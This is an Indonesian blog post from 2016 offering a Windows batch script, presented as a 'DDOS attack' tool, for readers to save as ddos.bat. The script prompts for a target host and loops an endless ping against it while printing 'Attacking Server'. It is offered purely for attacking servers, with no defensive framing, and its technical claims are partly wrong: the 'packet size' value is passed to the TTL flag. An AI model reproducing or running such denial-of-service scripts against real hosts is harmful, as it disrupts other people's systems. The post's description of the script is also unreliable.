Senin, 15 Februari 2016

Cara Membuat DDOS Attack menggunakan Notepad

@hacker
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo
echo DDOS With Batchfile
echo
echo.
set /p x=Server-Target:
echo.
echo
ping %x%
echo
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

salin di notepad ya gan terus as type ganti dengan all file.
dan jangan lupa kasih nama BAT
contoh ddos.bat 

Tidak ada komentar:

Posting Komentar